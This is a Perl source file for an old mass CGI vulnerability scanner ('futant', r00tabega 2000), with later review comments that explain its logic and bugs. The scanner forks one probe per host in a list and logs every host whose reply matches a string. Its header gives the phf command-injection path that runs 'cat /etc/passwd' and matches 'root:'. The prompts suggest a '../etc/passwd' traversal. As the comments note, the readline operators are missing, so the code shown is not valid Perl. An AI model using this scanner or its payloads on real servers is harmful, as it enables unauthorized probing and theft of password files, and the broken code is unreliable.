#!/usr/bin/perl
# futant - r00tabega 2000
# This is a little tool that will scan a list of hostnames
# for a certain CGI or any web file for that matter and try
# to match a user-given string to the text returned by the
# webserver after the GET operation.
#
# For example, say you are searching for the old .phf hole,
# you would put /cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
# in for the CGI path and root: in for the CGI string.
#
# Some of this code was ripped from Xphere whoever that is.
#
# NOTE(review): this listing was flattened onto one line by extraction
# and the angle-bracket readline operators that evidently sat in the
# empty `chomp($x = )` and `while ()` expressions did not survive.  As
# shown the script is not valid Perl; the comments below describe the
# apparent intent and treat those readline sources as an assumption.
# There is no `use strict`/`use warnings`: every variable other than
# $server and $port inside checkh() is a package global.
#
# Shape of the program: one forked child per line of the host list,
# the parent pausing 10 s between forks.  Each child has a 25 s alarm
# covering DNS lookup, connect and the response read, sends a single
# HTTP/1.0 GET, and appends one line to the log file when a response
# line matches the user-supplied pattern.

use Socket;

# Alarm handler.  The child wraps checkh() in alarm(25), so a stalled
# lookup, connect or read ends the child with exit(0) instead of hanging.
$SIG{'ALRM'} = sub { exit(0) };
# Reap one finished child per SIGCHLD so exited children do not linger
# as zombies while the parent keeps forking.
$SIG{'CHLD'} = sub { wait };

print "\n\e[0;34m[CGI Scanner by futant]\e[0m\n\n";

# Four interactive prompts (ANSI-coloured).  Each `chomp($x = )` below is
# missing its right-hand side; a readline from standard input appears
# to have been lost in extraction -- TODO confirm against the original.
print "\e[0;33mHost list filename:\e[0m ";
chomp($in = );
print "\n\e[0;32mLog filename:\e[0m ";
chomp($out = );
print "\n\e[0;35mCGI path (/cgi-bin/blah.cgi?blah=../etc/passwd):\e[0m ";
chomp($cgipath = );
print "\n\e[0;31mString to match (root:):\e[0m ";
chomp($cgistring = );
print "\n\n";

# Two-argument open: the typed filename is also parsed for a mode
# prefix or suffix (a leading '>' or '|', a trailing '|'), so a name
# containing those characters is opened for writing or run as a
# command instead of read.  Three-argument open(IN, '<', $in) takes
# the name literally.  The log is opened in append mode; OUT is
# inherited by every child, which writes to it directly.
open(IN, "$in") || die "Can't open $in!";
open(OUT, ">>$out") || die "Can't create $out!";

# Host-list loop.  The readline source is missing here too (the empty
# `while ()`); each iteration is expected to leave one line in $_.
while () {
    chomp($line = $_);
    # /(\S*)/ can match the empty string, so this branch is always taken
    # and $1 is the leading run of non-whitespace, possibly "" -- a blank
    # line still forks a child that then tries to resolve "".
    if ($line =~ /(\S*)/) {
        if ($pid = fork) {
            # Parent: throttle to roughly one child every 10 s.  A SIGCHLD
            # arriving during the sleep may cut it short.
            sleep 10;
        } elsif (defined($pid)) {
            # Child: hard 25 s budget for the whole probe, then exit
            # without returning to the loop.  A failed fork (undef $pid)
            # silently skips the host.
            alarm(25);
            checkh($1);
            alarm(0);
            exit(0);
        }
    }
}

# checkh($server): probe one host.  Reads the globals $cgipath and
# $cgistring set at the prompts and writes hits to the OUT log handle;
# progress text goes to the terminal.  No meaningful return value --
# the calling child exits right after.
sub checkh {
    my ($server) = @_;
    my ($port) = 80;
    # Single-quoted as shown: $hostname becomes the literal string
    # 'hostname' with its last character chopped off ('hostnam'), not
    # the machine's name.  Backticks were presumably intended -- TODO
    # confirm against the original.  Either way the value only feeds
    # the local bind address below.
    chop($hostname = 'hostname');
    print "trying $server...";
    ($name, $aliases, $proto) = getprotobyname('tcp');
    # Dead branch: $port is the numeric literal 80, so the /^\d+$/ test
    # always succeeds and getservbyname() is never called.
    ($name, $aliases, $port) = getservbyname($port,'tcp') unless $port =~ /^\d+$/;
    # Unchecked lookups.  If either fails its address slot is undef and
    # pack's 'a4' below appears to NUL-pad it to four zero bytes: for
    # $thisaddr that amounts to binding INADDR_ANY, for $thataddr a
    # connect to 0.0.0.0 -- verify on the target platform.
    ($name, $aliases, $type, $len, $thisaddr) = gethostbyname($hostname);
    ($name, $aliases, $type, $len, $thataddr) = gethostbyname($server);
    # Return value of socket() is not checked.
    socket(S, AF_INET, SOCK_STREAM, $proto);
    # Hand-built sockaddr_in: family, port (network order), 4-byte IPv4
    # address, 8 bytes of padding.  Socket.pm's sockaddr_in() produces
    # the same structure.
    $sockaddr = 'S n a4 x8';
    $this = pack($sockaddr, AF_INET, 0, $thisaddr);
    $that = pack($sockaddr, AF_INET, $port, $thataddr);
    if (bind(S, $this) && connect(S, $that)) {
        # select(S) makes the socket the DEFAULT output handle for the
        # rest of this sub, so the bare `print " Yes!\n"` / `print " No.\n"`
        # below are written to the remote server, not the terminal; only
        # the explicit `print OUT` reaches the log.  $|=1 then unbuffers S.
        select(S); $|=1;
        # Minimal HTTP/1.0 request: no Host or User-Agent header, and
        # $cgipath inserted verbatim.  On the server side this request
        # shape, followed by the stray " No." lines the bug above sends
        # down the same connection, is distinctive in access/error logs.
        print S "GET $cgipath HTTP\/1.0\r\n\r\n";
        # Response read loop; the readline source (the socket) is missing
        # from the empty `while ()` as shown.  One iteration per line.
        while () {
            chomp($serv = $_);
            # $cgistring is used as an unquoted regex, so metacharacters
            # in the typed string are interpreted (\Q...\E would match it
            # literally).  A hit appends one line to the log; every child
            # appends to the same handle with no locking, so lines from
            # concurrent children may interleave.
            if ($serv =~ $cgistring) {
                print OUT "$server has $cgipath.\n";
                print " Yes!\n";
            } else {print " No.\n";}
        }
    }
    # Closed even when bind/connect failed.
    close(S);
}

# Parent only: give outstanding children 15 s, then close the handles.
# Children exit inside the loop above and never reach this point.
sleep 15;
close(IN);
close(OUT);